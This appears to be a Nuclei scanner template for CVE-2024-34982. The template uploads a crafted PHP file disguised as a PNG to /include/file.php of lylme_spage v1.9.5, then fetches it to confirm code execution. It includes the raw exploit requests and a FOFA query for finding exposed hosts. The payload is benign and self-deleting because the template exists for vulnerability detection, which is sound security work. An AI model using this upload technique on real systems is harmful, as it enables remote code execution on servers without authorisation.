2024-06-18 07:04:32 +00:00
id : CVE-2024-34982
info :
name : LyLme-Spage - Arbitary File Upload
author : DhiyaneshDk
severity : high
description : |
An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.
reference :
- https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
- https://github.com/tanjiti/sec_profile
- https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py
metadata :
verified : true
max-request : 1
fofa-query : icon_hash="-282504889"
tags : cve,cve2024,lylme-spage,rce,intrusive
flow : http(1) && http(2)
variables :
string : "{{randstr}}"
filename : "{{to_lower(rand_text_alpha(5))}}"
http :
- raw :
- |
POST /include/file.php HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=---------------------------575673989461736
-----------------------------575673989461736
Content-Disposition : form-data; name="file"; filename="{{filename}}.php"
Content-Type : image/png
<?php echo "{{string}}";unlink(__FILE__);?>
-----------------------------575673989461736 --
matchers-condition : and
matchers :
- type : word
words :
- '"code":'
- '"msg":'
- 'php"}'
condition : and
- type : status
status :
- 200
extractors :
- type : regex
name : path
part : body
group : 1
regex :
- '"url":"([/a-z_0-9.]+)"'
internal : true
- raw :
- |
GET {{path}} HTTP/1.1
Host : {{Hostname}}
matchers :
- type : dsl
dsl :
- 'contains(body, "{{string}}" )'
- 'contains(header, "text/html")'
condition : and
2024-06-19 06:46:17 +00:00
# digest: 4a0a004730450220440784f1e1d309bfb1eee99fbcaf02afe7bfa185b48f07233df0f14cac9e9d9b0221009072b53098bb58d0d3efd14db1a3fc5f7b0b4593a0426fa060db0c42edd6f029:922c64590222798bb761d5b6d8e72950
